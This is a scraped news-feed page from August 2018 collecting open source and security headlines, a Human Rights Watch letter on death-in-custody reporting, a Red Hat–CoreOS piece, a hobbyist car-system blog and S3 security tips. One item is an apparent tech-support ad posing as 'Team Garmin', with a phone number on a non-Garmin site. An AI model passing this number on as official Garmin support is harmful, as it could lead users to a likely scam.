Next Page: 10000

          Network Break 135: HPE Vs. Nutanix; CCDE Exam Blues      Cache   Translate Page   Web Page Cache   
Take a Network Break! This week we have stories on HPE and Nutanix, a mysterious CCDE exam cancellation, an open source telemetry project finding a home in the Linux Foundation & more.
          Julia 1.0 Released, 2018 State of Rust Survey, Samsung Galaxy Note 9 Launches Today, Margaret Dawson of Red Hat Named Business Role Model of the Year in Women in IT Awards and Creative Commons Awarded $800,000 from Arcadia       Cache   Translate Page   Web Page Cache   

News briefs for August 9, 2018.

Julia 1.0 made its debut yesterday—the "culmination of nearly a decade of work to build a language for greedy programmers". The language's goal: "We want a language that's open source, with a liberal license. We want the speed of C with the dynamism of Ruby. We want a language that's homoiconic, with true macros like Lisp, but with obvious, familiar mathematical notation like Matlab. We want something as usable for general programming as Python, as easy for statistics as R, as natural for string processing as Perl, as powerful for linear algebra as Matlab, as good at gluing programs together as the shell. Something that is dirt simple to learn, yet keeps the most serious hackers happy. We want it interactive and we want it compiled." You can download it here.

The Rust Community announced the 2018 State of Rust Survey, and they want your opinions to help them establish future development priorities. The survey should take 10–15 minutes to complete, and is available here. And, you can see last year's results here.

Samsung Galaxy Note 9 launches today at 11am ET. You can watch the spectacle via Android Central, which will be streaming the live event.

Margaret Dawson, Vice President, Portfolio Product Marketing at Red Hat, was named Business Role Model of the Year at the inaugural Women in IT Awards USA. The awards were organized by Information Age to "redress the gender imbalance by showcasing the achievements of women in the sector and identifying new role models".

Creative Commons was awarded $800,000 from Arcadia (a charitable fund of Lisbet Rausing and Peter Baldwin) to support CC Search, which is "a Creative Commons technology project designed to maximize discovery and use of openly licensed content in the Commons". CC Search, along with Commons Metadata Library and the Commons API, plans to form the Commons Collaborative Archive and Library, a suite of tools that will "make the global commons of openly licensed content more searchable, usable, and resilient, and to provide essential infrastructure for collaborative online communities".


          PostgreSQL 10.5-1      Cache   Translate Page   Web Page Cache   
A powerful, open source object-relational database system. 2018-08-09
          Comments on proposed DOJ Bureau of Justice Assistance (BJA) implementation of the Death in Custody Reporting Act (DCRA)      Cache   Translate Page   Web Page Cache   

August 9, 2018

Mr. Chris Casto
Senior Advisor
Bureau of Justice Assistance
810 Seventh Street, NW
Washington, DC 20531
 
Re: Death in Custody Reporting Act Collection, 83 Fed. Reg. 27023 (June 11, 2018)
Comments submitted via DICRAComments@usdoj.gov  
 
Dear Mr. Casto:

On behalf of Human Rights Watch, I am writing in response to the Department of Justice’s (DOJ) request for comment on proposed DOJ Bureau of Justice Assistance (BJA) implementation of the Death in Custody Reporting Act (DCRA). Established in 1978, Human Rights Watch (HRW) is known for its accurate fact-finding, impartial reporting, effective use of media, and targeted advocacy, often in partnership with local human rights groups. Each year, we publish more than 100 reports and briefings on human rights conditions in some 90 countries, generating extensive coverage in local and international media. The United States Program of HRW protects and promotes the fundamental rights and dignity of every person subject to the authority of the US government.

DCRA was enacted as a result of bipartisan efforts on December 18, 2014, so that the government could account for the number of arrest-related deaths and other deaths in custody that are occurring in the United States. Nearly four years later, DCRA has not been implemented and the public continues to rely on media outlets for the number of people killed by police each year, which is estimated at 1,000.

DOJ must immediately adopt the near-final compliance guidelines for DCRA that were published in the Federal Register on December 19, 2016. These guidelines reflect extensive review and public engagement by DOJ around DCRA implementation through two comments periods, the first initiated on August 4, 2016, and a second initiated on December 19, 2016. Under the last set of guidelines published by DOJ in December 2016, states were to begin reporting arrest-related deaths in April of 2017, with reporting on all deaths in custody to begin in October 2017.

We are asking DOJ to immediately adopt the near-final compliance guidelines for DCRA that were published in the Federal Register on December 19, 2016. These guidelines reflect extensive review and public engagement by DOJ around DCRA implementation through two comments periods in 2016, during which HRW provided comments and joined the civil and human rights community in calling for implementation. DOJ must proceed with implementing DCRA as set forth in the proposed December 2016 guidelines and as described below:

  1. States must proactively report all deaths in custody to DOJ and DOJ must verify the state data with open source research and data.

States should be required to initially report all deaths in custody to DOJ as required by DCRA. DOJ should then use media reports and other open source information to identify deaths in custody for purposes of comparison and supplementation.  This hybrid methodology recognizes state obligations to proactively report deaths in custody to the federal government, allowing states to develop dedicated programs and resources to ensure compliance with DCRA. A hybrid approach also helps ensure the most accurate, reliable, and complete method of securing national data.

  1. DOJ must further define what deaths are reportable under DCRA to ensure standardized and full compliance by states.

DCRA requires states and federal law enforcement agencies to report information about the death of anyone who is “detained, under arrest, or is in the process of being arrested, is en route to be incarcerated, or is incarcerated.” DOJ’s latest proposal for DCRA compliance defines “reportable death” to broadly include “deaths that occurred during interactions with law enforcement personnel or while the decedent was in their custody or in the custody, under the supervision, or under the jurisdiction of a state or local law enforcement or correctional agency, such as a jail or prison.” To ensure compliance and reduce variation among state reporting, DOJ should provide a list of broad, yet specific, circumstances that qualify as reportable deaths.  For example, DOJ should specify that a reportable death includes any death “due to any use of force by law enforcement personnel.” It is critical that any law enforcement action that results in a civilian death be reported.   

  1. DOJ must require reporting on any disability of those who die in custody.

DOJ must require states to report disability-related data for deaths in custody. It is estimated that a quarter to half of fatal police encounters involve a person with a disability. These disabilities include physical, intellectual, and psychiatric disabilities. To ensure comprehensive data on deaths in custody, a decedent’s disability should be reported just as race, gender, and other characteristics are to be reported. The Bureau of Justice Statistics (BJS) should consult with the nationwide network of disability protection and advocacy (P&A) agencies in each state, as well as seek information from community-based disability organizations, to ensure that disability is properly captured in deaths in custody reporting.

  1. States must adopt compliance plans. 

Each state should be required to submit a detailed data collection plan to DOJ that summarizes how it will comply with DCRA. States should indicate how they will meet DCRA’s quarterly reporting requirements in a timely, accurate, and complete manner. These state compliance plans would facilitate data collection from local police departments to the states, which would then report to DOJ. Plans should also provide for audits of state reporting to ensure full compliance.

  1. Federal grants must be used to ensure state compliance.

States that do not comply with DCRA should have federal funding reduced until compliance is met as permitted by the statute. DCRA gives the Attorney General the power to subject noncompliant states to a 10 percent reduction of Edward Byrne Memorial Justice Assistance Grant Program (Byrne JAG) funds. After years of inadequate reporting, Congress included this provision in its reauthorization of DCRA to ensure compliance. DOJ must provide states with details on how and when Byrne JAG funds will be reduced for DCRA noncompliance.

In our May 2015 report, Callous and Cruel, HRW documented deaths behind bars of persons with mental health problems who were stunned with electric shock devices, restrained, subjected to massive amounts of pepper spray, and/or struck by correctional staff. Deaths of inmates (with or without mental health problems) at the hands of jail or prison staff continue to surface with unfortunate regularity in the news media. Yet our research, including conversations with correctional experts, suggests that there may be jail and prison inmates whose deaths following staff use of force are not reported publicly. Unknown deaths in custody that constitute homicides by correctional officers should not be permitted.

Information pertaining those who died following staff use of force in jails and prisons, such as  the role of involved staff, surrounding circumstances and related custodial settings is as important as similar information for arrest-related deaths. We do not believe the burden of providing full information to the BJS on use of force deaths would outweigh the benefit to the public and to agencies themselves.

We appreciate your engagement on this matter and look forward to your response. If you have any questions, please contact me at 202-612-4343.

Sincerely,

Jasmine L. Tyler
US Program, Advocacy Director

          today's leftovers      Cache   Translate Page   Web Page Cache   

          Amazon launches Auto SDK to bring Alexa to more cars      Cache   Translate Page   Web Page Cache   

Amazon today announced an open source release of the Alexa Automotive Core (AAC) SDK, or Auto SDK, to help automakers integrate Alexa voice control into cars and their infotainment systems, screens often used for navigation, media, or climate control. The software development kit is free for download on GitHub and is optimized for bringing Alexa to in-car […]


          Security Leftovers      Cache   Translate Page   Web Page Cache   
  • People Think Their Passwords Are Too Awesome For Two Factor Authentication. They’re Wrong.
  • Security updates for Thursday
  • Let's Encrypt Now Trusted by All Major Root Programs

    Now, the CA’s root is directly trusted by almost all newer versions of operating systems, browsers, and devices. Many older versions, however, still do not directly trust Let’s Encrypt.

    While some of these are expected to be updated to trust the CA, others won’t, and it might take at least five more years until most of them cycle out of the Web ecosystem. Until that happens, Let’s Encrypt will continue to use a cross signature.

  • WPA2 flaw lets attackers easily crack WiFi passwords

    The security flaw was found, accidentally, by security researcher Jens Steube while conducting tests on the forthcoming WPA3 security protocol; in particular, on differences between WPA2's Pre-Shared Key exchange process and WPA3's Simultaneous Authentication of Equals, which will replace it. WPA3 will be much harder to attack because of this innovation, he added.

  • ​Linux kernel network TCP bug fixed

    Another day, another bit of security hysteria. This time around the usually reliable Carnegie Mellon University's CERT/CC, claimed the Linux kernel's TCP network stack could be "forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service (DoS)."

  • State of Security for Open Source Web Applications 2018

    ach year, we publish a set of statistics summarizing the vulnerabilities we find in open source web applications. Our tests form part of Netsparker's quality assurance practices, during which we scan thousands of web applications and websites. This helps us to add to our security checks and continuously improve the scanner's accuracy.

    This blog post includes statistics based on security research conducted throughout 2017. But first, we take a look at why we care about open source applications, and the damage that can be caused for enterprises when they go wrong.

  • New Actor DarkHydrus Targets Middle East with Open-Source Phishing [Ed: Headline says "Open-Source Phishing," but this is actually about Microsoft Windows and Office (proprietary and full of serious bugs)]

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign.

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign, mounted by a newly-named threat group known as DarkHydrus. In a twist on the norm, the group is leveraging the open-source Phishery tool to carry out its dark work.

    The attacks follow a well-worn pattern, according to Palo Alto Networks’ Unit 42 group: Spear-phishing emails with attached malicious Microsoft Office documents are leveraging the “attachedTemplate” technique to load a template from a remote server.

read more


          today's howtos      Cache   Translate Page   Web Page Cache   

read more


          Linux Foundation and Kernel News      Cache   Translate Page   Web Page Cache   

read more


          Security Leftovers      Cache   Translate Page   Web Page Cache   
  • Voting By Cell Phone Is A Terrible Idea, And West Virginia Is Probably The Last State That Should Try It Anyway

    So we've kind of been over this. For more than two decades now we've pointed out that electronic voting is neither private nor secure. We've also noted that despite this several-decade long conversation, many of the vendors pushing this solution are still astonishingly-bad at not only securing their products, but acknowledging that nearly every reputable security analyst and expert has warned that it's impossible to build a secure fully electronic voting system, and that if you're going to to do so anyway, at the very least you need to include a paper trail system that's not accessible via the internet.

  • Dell EMC Data Protection Advisor Versions 6.2 – 6.5 found Vulnerable to XML External Entity (XEE) Injection & DoS Crash

    An XML External Entity (XEE) injection vulnerability has been discovered in Dell’s EMC Data Protection Advisor’s version 6.4 through 6.5. This vulnerability is found in the REST API and it could allow an authenticated remote malicious attacker to compromise the affected systems by reading server files or causing a Denial of Service (DoS crash through maliciously crafted Document Type Definitions (DTDs) through the XML request.

  • DeepLocker: Here’s How AI Could ‘Help’ Malware To Attack Stealthily

    By this time, we have realized how artificial intelligence is a boon and a bane at the same time. Computers have become capable of performing things that human beings cannot. It is not tough to imagine a world where you AI could program human beings; thanks to sci-fi television series available lately.

  • DeepLocker: How AI Can Power a Stealthy New Breed of Malware

    Cybersecurity is an arms race, where attackers and defenders play a constantly evolving cat-and-mouse game. Every new era of computing has served attackers with new capabilities and vulnerabilities to execute their nefarious actions.

  • DevSecOps: 3 ways to bring developers, security together

    Applications are the heart of digital business, with code central to the infrastructure that powers it. In order to stay ahead of the digital curve, organizations must move fast and deploy code quickly, which unfortunately is often at odds with stability and security.

    With this in mind, where and how can security fit into the DevOps toolchain? And, in doing so, how can we create a path for successfully deterring threats?

  • Top 5 New Open Source Security Vulnerabilities in July 2018 [Ed: Here is Microsoft's partner WhiteSource attacking FOSS today by promoting the perception that "Open Source" = bugs]
  • DarkHydrus Relies on Open-Source Tools for Phishing Attacks [Ed: I never saw a headline blaming "proprietary tools" or "proprietary back door" for security problems, so surely this author is just eager to smear FOSS]
  • If for some reason you're still using TKIP crypto on your Wi-Fi, ditch it – Linux, Android world bug collides with it [Ed: Secret 'standards' of WPA* -- managed by a corporate consortium -- not secure, still...]

    It’s been a mildly rough week for Wi-Fi security: hard on the heels of a WPA2 weakness comes a programming cockup in the wpa_supplicant configuration tool used on Linux, Android, and other operating systems.

    The flaw can potentially be exploited by nearby eavesdroppers to recover a crucial cryptographic key exchanged between a vulnerable device and its wireless access point – and decrypt and snoop on data sent over the air without having to know the Wi-Fi password. wpa_supplicant is used by Linux distributions and Android, and a few others, to configure the Wi-Fi for computers, gadgets, and handhelds.

  • Linux vulnerability could lead to DDoS attacks

read more


          BlackHat USA 2018       Cache   Translate Page   Web Page Cache   

Black Hat官网地址:https://www.blackhat.com/

会议介绍

BlackHat作为全球信息安全行业的最高盛会,有着悠久历史,今年已经进入了第21个年头,每次会议的议题筛选都极为严格。众多议题提交后通过率不足20%,所以Black Hat也被称为最具技术性的信息安全会议。

安全客在本届BlackHat会议上,邀请了众多参会的安全大牛,在大会现场同步和大家分享看到的精彩议题。

时间:2018年8月8日-9日

议题速递——次日上半场

Stop that Release, There’s a Vulnerability!

演讲人:Christine Gadsby  |  Director, Product Security Operations, BlackBerry

演讲时间:9:00-9:25

主题标签:Security Development Lifecycle,Enterprise

Software companies can have hundreds of software products in-market at any one time, all requiring support and security fixes with tight release timelines or no releases planned at all. At the same time, the velocity of open source vulnerabilities that rapidly become public or vulnerabilities found within internally written code can challenge the best intentions of any SDLC.
How do you prioritize publicly known vulnerabilities against internally found vulnerabilities? When do you hold a release to update that library for a critical vulnerability fix when it’s already slipped? How do you track unresolved vulnerabilities that are considered security debt? You ARE reviewing the security posture of your software releases, right?
As a software developer, product owner, or business leader being able to prioritize software security fixes against revenue-generating features and customer expectations is a critical function of any development team. Dealing with the reality of increased security fix pressure and expectations of immediate security fixes on tight timelines are becoming the norm.
This presentation looks at the real world process of the BlackBerry Product Security team. In partnership with product owners, developers, and senior leaders, they’ve spent many years developing and refining a software defect tracking system and a risk-based release evaluation process that provides an effective software ‘security gate.’ Working with readily available tools and longer-term solutions including automation, we will provide solutions attendees can take away and implement immediately.
• Tips on how to document, prioritize, tag, and track security vulnerabilities, their fixes, and how to prioritize them into release targets
• Features of common tools [JIRA, Bugzilla, and Excel] you may not know of and examples of simple automation you can use to verify ticket resolution.
• A guide to building a release review process, when to escalate to gate a release, who to inform, and how to communicate.


          E779: Brian Armstrong, Coinbase & Tim Draper, DFJ on the state of cryptocurrency’s maturing market: ICOs as new funding vehicle, disruption of VC, the end of fiat, rise of open source, & the continued dominance & resiliency of bitcoin      Cache   Translate Page   Web Page Cache   
none
          E634: Hadley Wickham, RStudio Chief Scientist & open source pioneer, on breakthroughs in data science, visualization, statistics & the biggest philosophical questions facing humanity      Cache   Translate Page   Web Page Cache   
none
          Offer - Dial +1877-370-8184 We help to troubleshoot Garmin Update Errors - USA      Cache   Translate Page   Web Page Cache   
Different types of GPS devices used by the customer. Garmin has dependably possessed the capacity to consummate top quality GPS Devices for various parts, for example, flying, marine and street transport and offers open source solutions for updates. These solutions enable you to download for nothing out of pocket the different updates expected to refresh your navigation system in several countries. GPS, this navigation satellite-based system intended to in a split second give position, speed and time data has developed as of late similar to a progressive and advantageous innovation. Garmin Devices should be refreshed every day with a specific end goal to give the data precisely.Some errors support service provide by our Experts How to update GPS Map How to update Garmin New version Nuvi update storage Free update error Slow internet connection with GPS VPN/Proxy is not disabled How to used lifetime update MapIf you want to be communicate with Garmin Experts. So you can call on our customer phone number. We are providing the independent service without any time limit.Visit:- http://www.garmingpsupdate.com/Thanks & RegardsTeam Garmin500 south anaheim hills California 92807 USAPhone: +1877-370-8184Email: support@garmingpsupdate.com
          BasicMinimap (v8.0.7)      Cache   Translate Page   Web Page Cache   
Change Log:
--------------------
BasicMinimap
v8.0.7 (2018-08-09)
Full Changelog Previous releases

Options: Don't restrict the size to multiples of 5. You can now type in a size between 140-145 for example.


Description:
--------------------
https://cdn-wow.mmoui.com/preview/pvw68420.png Please support my work on Patreon!

BasicMinimap is a basic solution to a clean, square minimap.

Features:
Moving & Scaling
Hiding blizz buttons
Zooming with mouse wheel & Auto zoom-out
Square or circular minimap
Auto showing the calendar button when invites arrive
Border and border color selection with class color support


Default buttons (configurable):
LeftClick: Ping Position
RightClick: Toggle Calendar
MiddleClick: Toggle Tracking


Options:

/bm
/basicminimap


BasicMinimap is open source and development is done on GitHub. You can contribute code, localization, and report issues there: https://github.com/funkydude/BasicMinimap
          Android 9 Pie source code reveals support for wallpapers in Always on Display mode      Cache   Translate Page   Web Page Cache   
Google has just launched the latest version of its mobile operating system Android, the Android 9 Pie. Right after the announcement, the company started rolling out the Android 9 Pie OTA updates for its Pixel devices and shortly after the company started uploading the source code of Android Pie to the Android Open Source Project […]
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          What's your opinion of Slack as a business tool?      Cache   Translate Page   Web Page Cache   

Messaging amongst co-workers is one of the most important forms of communication that your organization relies upon and Slack is an interesting tool for this constant need in all businesses.

I’ve been recommending businesses look at Slack (https://slack.com) as a means to thwart so many of today’s corporate-focused phishing scams, but it provides much more than just secure, private messaging.

A Little History

The initial creation of this cloud-based platform was as an internal communication tool developed by a group of developers working on an online gaming project.

When it became clear that the gaming project was not going to make it to market, the company refined their internal communication tool and started making it available to other companies.

What Does Slack Do?

In a nutshell, Slack is a combination of various familiar messaging platforms (chat, instant messaging, email) mixed with file sharing.

You start by creating a team or teams, depending upon your corporate structure and then create various channels that can either be public or private – think of channels as themes or topics.

All the information posted publicly is searchable by anyone in your organization from a single place, which is one of the biggest benefits to most companies.  Imagine a new employee being able to search every previous communication or uploaded file about virtually any subject from any device.

It essentially keeps important company communications and files from being trapped in individual email accounts and creates an archive for every current or future employee to use as well.

How Can It Help?

If you think about how much of today’s inter-office communication is conducted via email, it’s not hard to see how lots of important information never get’s to everyone that should be in the loop.


Unless an employee remembers to CC or BCC someone that should be part of a conversation -which done incorrectly is a constant irritation in and of itself - that person will be left out of the loop.

Another huge challenge that most companies face is a single employee being tricked by a clever scammer’s email message that is posing as a fellow employee or important person in management.

By moving all your inter-office communications to a platform like Slack, you can instantly train every employee to be suspicious or ignore any email message that claims to be from another employee or company management.

Slack offers a free version of its tool that may be all a small group may need: https://goo.gl/mqvpQC


Potential Issues

As popular as this platform has become with so many businesses, there are things you’ll need to consider before attempting to convert your company to this new tool.

Using Slack can easily be perceived as ‘yet another thing I have to check’ by your already busy employees, so make sure you understand what it will take for Slack to become valuable to everyone, not just management.

Slack stores all of your communications on its own servers; if that’s a non-starter for you, check out open source, self-hosted alternatives from Mattermost (https://mattermost.com) or Rocket.Chat (https://rocket.chat).


          Why Red Hat Invested $250M in CoreOS to Advance Kubernetes      Cache   Translate Page   Web Page Cache   

For the last three years or so, Red Hat has been on a collision course with CoreOS, with both firms aiming to grow their respective Kubernetes platform. On Jan. 30, the competition between the two firms ended, with CoreOS agreeing to be acquired by Red Hat in a $250 million deal.

CoreOS didn't start out as a Kubernetes platform vendor, but then again neither did Red Hat. CoreOS' original innovations were the etcd distributed key value store, a purpose-built container linux operating system
Why Red Hat Invested 0M in CoreOS to Advance Kubernetes
(originally known as CoreOS Linux) and the company's Fleet platform that enabled Docker containers to easily be run as a cluster. In a 2017video interview with ServerWatch CoreOS co-founder and CTO Brandon Philips explained why his company moved on from Fleet and embraced Kubernetes with its Tectonic platform.

Red Hat's OpenShift platform was originally built based on technologyacquiredfrom Platform-as-a-Service vendor Makara in 2010. Red Hat entirely re-worked the platform for its 3.0 release in 2015, re-basing it on Docker and Kubernetes.

While Red Hat OpenShift and CoreOS Tectonic are both based on Kubernetes, they were highly competitive with each other. Though that's not how Red Hat sees it.

"CoreOS' existing commercial products are complementary to existing Red Hat solutions," Matt Hicks, senior vice president, engineering, Red Hat, told ServerWatch . "Our specific plans and timeline around integrating products and migrating customers to any combined offerings will be determined over the coming months."

Hick said that it is Red Hat belief that CoreOS customers will benefit from industry-leading container and Kubernetes solutions, a broad portfolio of enterprise open source software, world-class support and an extended partner network.

CoreOS had been leading the development of the rkt container runtime, which is a rival to Docker-backed containerd runtime. Red Hat has its own effort known as CRI-O, which is based on containerd. CRI-O 1.0 wasreleasedin October 2017.

"rkt has a sustaining community within the Cloud Native Computing Foundation (CNCF) and that won't change," Hicks said. " Red Hat and CoreOS are both committed to furthering the standardization of key container standards to further enterprise adoption, as evidenced by our leadership positions within OCI. Specific product-level decisions will come in the following weeks around future investments."

Why Now?

Red Hat and CoreOS were actively competing against each other in the market. Red Hat CEO Jim Whitehurst has repeatedly made multiple comments in recent months about the financial success OpenShift has had.

"If you believe containerized applications will be kind of how applications are developed in the future, it will be a substantial opportunity," Whitehurstsaidin September 2017. "There is a lot of value in it [OpenShift], because it includes RHEL, it includes a fully supported life cycle Kubernetes and a whole set of management tools, and then, obviously, above that a whole developer tool chain."

Now with CoreOS as part of Red Hat, the value in OpenShift can potentially be expanded even further. Hicks said that CoreOS can expand Red Hat’s technology leadership in containers and Kubernetes and enhance core platform capabilities in OpenShift, Red Hat Enterprise Linux and Red Hat’s integrated container portfolio.

"Bringing CoreOS’s technologies to the Red Hat portfolio can help us further automate and extend operational management capabilities for OpenShift administrators and drive greater ease of use for end users building and managing applications on our platform," Hicks said.

Hicks added that CoreOS’s offerings complement Red Hat’s container solutions in a number of ways:

Tectonic and its investment in the Kubernetes project that it is based on are complementary to Red Hat OpenShift and Red Hat’s own investments in Kubernetes. CoreOS can further extend Red Hat’s leadership and influence in the Kubernetes upstream community and also bring new enhancements to Red Hat OpenShift around automated operations and management.

Container Linux and its investment in container-optimized Linux and automated “over the air” software updates are complementary to Red Hat Enterprise Linux, Red Hat Enterprise Linux Atomic Host and Red Hat’s integrated container runtime and platform management capabilities. Red Hat Enterprise Linux’s content, the foundation of our application ecosystem will remain our only Linux offering. Whereas, some of the delivery mechanisms pioneered by Container Linux will be reviewed by a joint integration team and reconciled with Atomic.

Quay brings expanded registry capabilities that can both enhance OpenShift’s integrated registry component and the Red Hat Container Catalog and be used as a standalone component.

In the final analysis, with Red Hat's acquisition of CoreOS, the big shift is that there is one less competitor in the Kubernetes landscape and the biggest player, just got bigger.

Sean Michael Kerner is a senior editor at ServerWatch and InternetNews.com. Follow him on Twitter @TechJournalist.


          My Own Car System, Rear Camera, Offline Maps & Routing, Map Matching with ...      Cache   Translate Page   Web Page Cache   

This is my journey building an open source car system with Go & Qt, rear camera, live OpenGL map …

Cross compilation

In Part I, I had to patch qtmultimedia for the camera to work, but Qt compilation is ressource hungry, same goes for the osrm compilation, the memory of the Raspberry Pi is too small.

I had to to set up a cross compilation system in my case for armv7h.

QML Development

Since most of the application is in QML , I’ve used the c++ main.cpp launcher as long as possible for the development.

At the moment I needed to inject data from the outside world (like the GPS location) to QML via Qt, so I switched to Go using therecipe Qt Go bindings .

The Go bindings project is young but the main author is really active fixing issues.

It makes desktop applications easy to code without the assle of C++ (at least for me).

About QML, by separating the logic and forms using .qml.ui you still can edit your views with Qt Creator :

That’s just the narrative, truth is Creator is really buggy and I edited the ui files by hand most of the time.

I worked with Interface Builder on iOS for years, Qt is painful, lack of decent visual editor for QML really hurts.

Serving the map without internet access

In Part I, we talked about OpenMapTiles and OpenGL rendering, but I needed a web server capable of reading MBTiles format and serving the necessary assets for the map to be rendered.

I’ve created mbmatch in Go for that purpose so mocs can render the map without Internet access, it will also map match the positions in the future.

Experimenting with another touch screen

I’m using a less performant but smaller LANDZO 5 Inch Touch Display 800x480

This touchscreen is handled as a one button mouse.

It can be calibrate using tslib ts_calibrate command.

Then in your start env tell Qt to use tslib.

TSLIB_TSDEVICE=/dev/input/event0 QT_QPA_GENERIC_PLUGINS=tslib:/dev/input/event0 QT_QPA_FB_TSLIB=1 GPS

Like I said inpart I, the linux gps daemons are using obscure and over complicated protocols so I’ve decided to write my own gps daemon in Go using a gRPC stream interface. You can find it here .

I’m also not satisfied with the map matching of OSRM for real time display, I may rewrite one using mbmatch .

POIs

I’ve started POIs lookups with full text search and geo proximity using bleve by exposing an API compatible with the OSM API so it can be used directly by QML Locations.

Night Map

I’m a huge fan of the Solarized colors , I’ve made a style for the map you can find it here


My Own Car System, Rear Camera, Offline Maps & Routing, Map Matching with  ...
Speeding up boot systemctl mask systemd-udev-settle.service systemctl mask lvm2-activation-net.service systemctl mask lvm2-monitor.service Status

The project is far from finished and not ready for everybody but it’s fun to play with.

I’ve open sourced most of the code for Mocs on github , feel free to contribute.


          Trustwave releases Social Mapper, an open source tool using facial recognition to find people's social profiles at scale, says it will help ethical hackers (Melanie Ehrenkranz/Gizmodo)      Cache   Translate Page   Web Page Cache   

Melanie Ehrenkranz / Gizmodo:
Trustwave releases Social Mapper, an open source tool using facial recognition to find people's social profiles at scale, says it will help ethical hackers  —  Security researchers released a tool this week that lets you collect social media profiles of a massive amount of people using face recognition.


          Re: Suitability for Class Administration Only      Cache   Translate Page   Web Page Cache   
by Colin Fraser.  

IMNSHO, it is tempting to try to adapt a favoured tool to another purpose, but in this case, what you're asking for is, I suggest, well outside Moodle's remit. What you're looking for is a Content Management System, CMS, or a Student Management System, SMS, not a Learning Management System. Moodle can be linked to PayPal, for one, for payment of courses, synced with Google Calendar, (I think)  but for things like teacher scheduling/tracking (essentially personnel/project management), asset management and advertising, no. I think you're setting yourself up for a lot of unhappy outcomes after an enormous amount of work. 

An online CMS would be something like Drupal or Joomla. I understand you can build such administrative capabilities into your system with these tools. There are a number of more specific Open Source products, I suspect, something like OpenBravo to take care of the financials and asset tracking, OpenOffice or Libra Office, for business functions, with OpenProject for project management. Some of these should fit into Drupal or Joomla so it may be you can build a small system to suit your own need fairly quickly. Drupal has a steep learning curve, Joomla is a bit more friendly apparently. 

I doubt there is a small, inexpensive tool that will do everything you need, but I would think there are a number of really expensive tools that could do what you want, right out the box. So basically, what do you want to pay for? How much do you want to pay? Good luck.   


          One Billion Apples' Secret Sauce: Recipe for the Apple Wireless Direct Link Ad hoc Protocol. (arXiv:1808.03156v1 [cs.NI])      Cache   Translate Page   Web Page Cache   

Authors: Milan Stute, David Kreitschmann, Matthias Hollick

Apple Wireless Direct Link (AWDL) is a proprietary and undocumented IEEE 802.11-based ad hoc protocol. Apple first introduced AWDL around 2014 and has since integrated it into its entire product line, including iPhone and Mac. While we have found that AWDL drives popular applications such as AirPlay and AirDrop on more than one billion end-user devices, neither the protocol itself nor potential security and Wi-Fi coexistence issues have been studied. In this paper, we present the operation of the protocol as the result of binary and runtime analysis. In short, each AWDL node announces a sequence of Availability Windows (AWs) indicating its readiness to communicate with other AWDL nodes. An elected master node synchronizes these sequences. Outside the AWs, nodes can tune their Wi-Fi radio to a different channel to communicate with an access point, or could turn it off to save energy. Based on our analysis, we conduct experiments to study the master election process, synchronization accuracy, channel hopping dynamics, and achievable throughput. We conduct a preliminary security assessment and publish an open source Wireshark dissector for AWDL to nourish future work.


          IMPIEGATA/O RISORSE UMANE a Bibione (VE) - OSM open source management - Bibione, Veneto      Cache   Translate Page   Web Page Cache   
Per la sede a Bibione (VE). Ti piacerebbe essere la persona che si occupa della crescita di un’azienda di successo partendo dai collaboratori interni e... €1.400 - €2.000 al mese
Da Indeed - Fri, 27 Jul 2018 08:32:01 GMT - Visualizza tutte le offerte di lavoro a Bibione, Veneto
          Updated ILIAS to 5.2.18      Cache   Translate Page   Web Page Cache   
ILIAS (ID : 619) package has been updated to version 5.2.18. ILIAS is a powerful Open Source Learning Management System for developing and realising web-based e-learning. The software was developed to reduce the costs of using new media in education and further training and to ensure the maximum level of customer influence in the implementation … Continue reading "Updated ILIAS to 5.2.18"
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Leaky Amazon S3 Buckets: Challenges, Solutions and Best Practices      Cache   Translate Page   Web Page Cache   

Amazon Web Service (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Here are five solutions you can use to evaluate the security of data stored in your S3 buckets.

For business professionals, the public cloud is a smorgasbord of micro-service offerings which provide rapid delivery of hardware and software solutions. For security and IT professionals, though, public cloud adoption represents a constant struggle to secure data and prevent unexpected exposure of private and confidential information. Balancing these requirements can be tricky, especially when trying to adhere to your organization’s unique Corporate Information Security Policies and Standards.

Amazon Web Service (AWS) S3 buckets have become a common source of data loss for public and private organizations alike. Industry researchers and analysts most often attribute the root cause of the data loss to misconfigured services, vulnerable applications/tools, wide-open permissions, and / or usage of default credentials.

Recent examples of data leaks from AWS storage buckets include:

Data leakage is only one of the many risks presented by misuse of AWS S3 buckets. For example, attackers could potentially replace legitimate files with malicious ones for purposes of cryptocurrency mining or drive-by attacks.

To make matters worse for organizations (and simpler for hackers), automated tools are available to help find insecure S3 buckets.

How to protect data stored in AWS S3 buckets

Going back to the basics provides the most direct path to protecting your data. Recommended best practices for S3 buckets include always applying the principle of least privileges by using IAM policies and resource-based controls via Bucket Policies and Bucket ACLs.

Another best practice is to define a clear strategy for bucket content by taking the following steps:

  • Creating automated monitoring / audits / fixes of S3 bucket security changes via Cloud Trail, Cloud Watch and Lambda.
  • Creating a bucket lifecycle policy to transfer old data to an archive automatically based on usage patterns and age.
  • When creating new buckets, applying encryption by default via server-side encryption (SSE-S3/SSE-C/SSE-KMS) and / or client-side encryption.
  • Creating an S3 inventory list to automatically report inventory, replication and encryption in an easy to use CSV / ORC format.
  • Testing, testing and testing some more to make sure the controls mentioned above have been implemented effectively and the data is secure.

Here at Tenable, I have researched five additional solutions you can use to evaluate the security of data stored in S3 buckets. These five solutions, when implemented correctly and incorporated into daily operational checklists, can help you quickly assess your organization’s cyber exposure in the public cloud and help you determine next steps for securing your business-critical data.

  • Amazon Macie: Automates data discovery and classification. Uses Artificial Intelligence to classify data files on S3 by leveraging a rules engine that identifies application data, correlates file extensions and predictable data themes, with strong regex matching to determine data type, cloud trail events, errors and basic alerts.
